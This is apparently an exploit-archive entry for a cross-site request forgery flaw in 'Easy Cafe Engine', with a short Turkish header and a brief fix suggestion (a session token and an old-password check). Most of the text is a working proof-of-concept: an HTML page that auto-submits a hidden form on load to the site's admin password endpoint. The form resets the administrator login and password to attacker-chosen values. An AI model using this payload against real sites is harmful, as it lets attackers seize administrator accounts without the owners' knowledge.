< ------------------- header data start ------------------- >

#############################################################

# Application Name : Easy Cafe Engine

# Vulnerable Type : Xsrf

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<bOdy onload=Submit();>
<script>function Submit(){document.frm.submit();}</script>
<form name=frm action=’http://easy.cafeengine.com/admin.php?section=password’ method=POST enctype=multipart/form-data>
<input type=hidden name=action value=update_options>
<td>Login</td>
<td><input type=text name=o[admin_login] value=system></td>
<td>password</td>
<td><input type=password name=o[admin_password] value=’hacker’></td>
<td>Confirm password</td>
<td><input type=password name=admin_password_c value=’hacker’></td>
<td colspan=2><input type=submit value=Submit></td>
</form>

< -- bug code end of -- >